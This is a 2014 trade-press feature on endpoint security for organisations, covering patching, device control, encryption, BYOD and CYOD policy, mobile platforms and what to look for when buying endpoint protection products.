Feature

How to use defence in depth to secure endpoint machines

Arguably the most important task of any endpoint security system is to protect against malware.

However, these products are less effective as attackers develop increasingly novel ways of sidelining device security.

The accuracy of antimalware technology has noticeably improved over the years but, at heart, only a few applications’ behaviours are profiled, typically the most used ones – Microsoft Office, Java, Adobe Acrobat, Flash and browsers.

Any odd behaviour exhibited by these applications can be picked up by an agent and this will deal with a threat by blocking unauthorised behaviour. Admittedly, this covers a lot of ground in the workaday use of a device, but it is clearly not a panacea – an intruder could easily attack less obvious applications on the device instead.

Endpoint security is not just about detecting and eradicating malware, it is also about making sure these devices are properly patched, configured and controlled to reduce the attack surface as much as possible. Endpoint agents need to work with patch management systems to ensure that, as soon as patches are tested by an organisation, they can be rolled out to devices, which should be configured for use on the infrastructure according to rules defined by the IT department.

Such rules should make provision for control over applications installed, services running, device settings and other security products installed on devices. It should be part of the IT department’s policy to identify when configurations have been changed, as this may indicate that malware has manipulated these to compromise a device.

Device control is important, as this will allow the IT department to enforce policy on who can use USB ports and how. What is copied to and from a USB device or SD card can be logged to minimise risk.

Top tips and best practices for endpoint security

  • Cyber criminals want to profit from hacking into your infrastructure, so follow these top tips and implement best practice to ensure they don’t get in:
  • Make sure your security policy is adaptable, robust and covers all endpoints. A well-written security policy will enable your IT department to know when to act – such as when browsers are out of date or operating systems need patching – to avoid malware finding its way to endpoint devices. But don’t limit your thinking to computing devices. Anywhere data is stored is a risk. This could mean USB sticks and consumer cloud storage as well.
  • Anticipate a data breach and plan accordingly. If a data breach occurs in your organisation, you don’t want to leave it until then to find the relevant people to inform. Keep a list of the most important people and stakeholders in your organisation and make plans for dealing with these kinds of situations. These plans should include: who will do what; what steps must be taken and when; and how the situation is to be cleaned up after the incident.
  • Make sure users know what to do to keep safe. Employees will use their devices to access resources on the infrastructure, so it is wise to make sure they know the dangers, as they can be the weakest link in an organisation’s security. If one user falls prey to a phishing attack, it could be enough for hackers to gain entry into the network. Emphasise the personal benefits of keeping to security policies to make users stick to them.
  • Identify sensitive data and encrypt it wherever it goes. An inventory of sensitive data – such as financial, human resources records, intellectual property, and contact and customer lists – must be identified, so the business understands what it could lose in a breach. This should be encrypted not only when it resides on a file server, but also when in transit and on the endpoint. A good endpoint security system will ensure this policy is adhered to and, alongside strong passwords, sensitive documents can be safeguarded.
  • Test for leaks. Assuming that, just because you have implemented an endpoint security system, you are safe is a bad idea; it needs to be tested to be sure. Third-party companies can help identify problems that the IT department may have overlooked.

How BYOD and mobility affect endpoint security

Traditional endpoint device management software isn’t up to the job of managing PCs, laptops and tablets, especially in a bring your own device (BYOD) environment, according to Ashley Leonard, chief executive of Verismic.

He says that traditional device management software can take “days or even weeks to deploy” because of agents required on each device. “Moves, adds and changes frequently cause black spots in data, making BYOD environments particularly difficult to manage,” he says. “Some endpoint management software even requires manual ‘Sneaker Net’ deployment of software, affecting users, IT departments and costs.”

He says this leaves organisations open to security threats through unlicensed and un-patched software applications and can even present compliance risk. But forbidding BYOD is not an option for many organisations. “Employees will use their personal devices anyway or use devices provided by the business for personal use,” says Louise Bulman, Europe vice-president of ForeScout. “The traditional enterprise perimeter is becoming more open and extended as the number of mobile and remote employees increases.”

Anand Sukumaran, vice-president of managed services at ITC Infotech, says businesses should consider replacing BYOD with “choose your own device” (CYOD). “This hybrid approach means a company will offer a choice of a selection of devices for remote and flexible working, with the user free to use it in their personal life as well,” he says.

More platforms – more ways in or more resilience to failure?

BYOD projects create a multitude of platforms to protect. Not only does the IT manager need to protect PCs and laptops running Windows, but phones and tablets running Android and iOS. Further down the line, organisations may need to consider protecting internet of things endpoints, such as sensors and wearable technology.

A criminal looking to infiltrate infrastructure has many tools at their disposal. If they can’t get in via a desktop or laptop, then a mobile device may offer a way in.

Securing mobile endpoints requires a slightly different strategy and mobile operating systems tend to sandbox apps to isolate them from one another and the mobile operating system (OS). Even antivirus apps are sandboxed, diminishing their capabilities if not rendering them completely ineffective. The data on devices is the most important thing and needs to be protected and encrypted, whether it is stored on the device or sent back and forth on the corporate network.

However, having multiple platforms can provide a modicum of protection, so far as having one device running a particular platform may not fall victim to malware aimed at another. An employee may have an infected PC quarantined from the network, but could still access data and remain productive from a smartphone running on a completely different platform.

What to think about when buying endpoint security

The three most important concerns in buying an endpoint security system are what it does, how it is managed and what platforms/devices it protects. The application on the endpoint itself must include in its very basic form: antivirus, antispyware, host-based intrusion prevention and a firewall. More advanced systems will also include device and application control, patch management assessment, URL filtering, data loss prevention, network access control and disk encryption.

There should be management features to allow administrators to look after part or all of the infrastructure. The console should include a dashboard where an administrator can quickly access users, groups and devices, as well as the policies to apply to these elements. These policies should be easily accessible and simple to create and update, as needs change. It should be easy to quickly discover and protect new endpoints. These can then be brought into management where they can be monitored and problems remediated quickly and safely.

Any endpoint security system should be able to protect all endpoints. Failure to do so will make such products at best useless to the organisations and, at worse, allow malicious actors to gain access to corporate assets.


This was first published in August 2014